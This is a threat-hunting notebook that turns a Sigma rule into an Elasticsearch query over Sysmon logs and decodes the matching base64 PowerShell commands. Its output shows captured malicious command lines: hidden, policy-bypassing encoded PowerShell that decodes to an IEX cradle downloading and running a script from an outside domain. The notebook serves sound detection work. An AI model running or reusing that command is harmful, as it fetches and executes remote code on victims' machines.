### Hunting detection #1

In [1]:
import sys,os
os.chdir('../../')
sys.path += [ os.path.abspath('../str-omega'), os.path.abspath('../str-omega/sigma/tools')]


## Import Libraries and convert detection to SIEM query

In [2]:
import json
from sigma.config.collection import SigmaConfigurationManager
from sigma.configuration import SigmaConfiguration, SigmaConfigurationChain
from sigma.parser.collection import SigmaCollectionParser
from sigma.backends.elasticsearch import ElastalertBackendQs

from sigma.backends.elasticsearch import ElasticsearchDSLBackend


class ConvertDetection(ElasticsearchDSLBackend):
    def __init__(self, *args, **kwargs):
        mapping, = args
        with open(mapping, 'r') as stream:
            self.sigmaconfigs = SigmaConfiguration(configyaml=stream)
        super().__init__(self.sigmaconfigs, {})

    def convert(self, a2b_file):
        with open(a2b_file, 'r') as stream:
            parser = SigmaCollectionParser(stream, self.sigmaconfigs, None)

        parser.generate(self)
        result = self.finalize()
        return result
        
mapping = "./Demo/RT-TOP5/detections/mapping.yml"
detection =  "./Demo/RT-TOP5/detections/detection1.yml"

backend = ConvertDetection(mapping)
query_txt = backend.convert(detection)
query = json.loads(query_txt)
print(json.dumps(
    query,
    sort_keys=True,
    indent=4,
    separators=(',', ': ')
))


{
    "query": {
        "constant_score": {
            "filter": {
                "bool": {
                    "must": [
                        {
                            "match_phrase": {
                                "event_id": "1"
                            }
                        },
                        {
                            "wildcard": {
                                "process_command_line.keyword": "* -e*"
                            }
                        },
                        {
                            "bool": {
                                "should": [
                                    {
                                        "wildcard": {
                                            "process_command_line.keyword": "* jab*"
                                        }
                                    },
                                    {
                                        "wildcard": {
                                           

## Create connection to SIEM and run converted query

In [3]:
#!python3 -m pip install elasticsearch
from elasticsearch import Elasticsearch
es = Elasticsearch(['http://localhost:9200'])
res = es.search(index="logs-endpoint-winevent-sysmon-*", body=query)
print("Got %d Hits" % res['hits']['total']['value'])

Got 2 Hits


## Check results 

In [4]:
from pandas import json_normalize
import pandas as pd
#pd.set_option('display.max_colwidth', None)

df = json_normalize([x['_source'] for x in res['hits']['hits']])

with pd.option_context('display.max_rows', None, 'display.max_columns', None, 'display.colheader_justify','light', 'display.width', 2000, 'display.max_colwidth', 500):
    df_styled = df.copy()
    df_styled = df_styled[['process_command_line']]
    df_styled = df_styled.stack().str.lstrip().unstack()
    df_styled = df_styled.style.set_properties(**{'text-align': 'left'})
    
df_styled

,process_command_line
0,"""c:\windows\system32\cmd.exe"" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8abgblahqadgbhagwabablahkaawblag4aeqbhac4aywbvag0alwbjahiabqauahaaaabwaciakqa="
1,powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8abgblahqadgbhagwabablahkaawblag4aeqbhac4aywbvag0alwbjahiabqauahaaaabwaciakqa=


## Decode powershell base64 commands

In [5]:
import re
import base64

    
def decode_b64(event):
    _BASE64_REGEX = "[A-Za-z0-9+\\n\\r]{30,}={0,2}"
    BASE64_REGEX_C = re.compile(_BASE64_REGEX, re.I | re.X)
    b64match = BASE64_REGEX_C.search(event)
    if b64match is None:
        return "-"
    b64_candidate = b64match[0]
    return base64.b64decode(b64_candidate).decode('utf-8')    
df['decoded'] = df.apply(lambda row: decode_b64(row['event_original_message']), axis=1)

with pd.option_context('display.max_rows', None, 'display.max_columns', None, 'display.colheader_justify','light', 'display.width', 2000, 'display.max_colwidth', 500):
    df = df[['decoded', 'process_command_line', 'process_name']]
    df = df.stack().str.lstrip().unstack()
    df = df.style.set_properties(**{'text-align': 'left'})
    
df


,decoded,process_command_line,process_name
0,"I E X   ( N e w - O b j e c t   N e t . W e b c l i e n t ) . d o w n l o a d s t r i n g ( "" h t t p : / / n e t v a l l e y k e n y a . c o m / c r m . p h p "" ) ","""c:\windows\system32\cmd.exe"" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8abgblahqadgbhagwabablahkaawblag4aeqbhac4aywbvag0alwbjahiabqauahaaaabwaciakqa=",cmd.exe
1,"I E X   ( N e w - O b j e c t   N e t . W e b c l i e n t ) . d o w n l o a d s t r i n g ( "" h t t p : / / n e t v a l l e y k e n y a . c o m / c r m . p h p "" ) ",powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8abgblahqadgbhagwabablahkaawblag4aeqbhac4aywbvag0alwbjahiabqauahaaaabwaciakqa=,powershell.exe
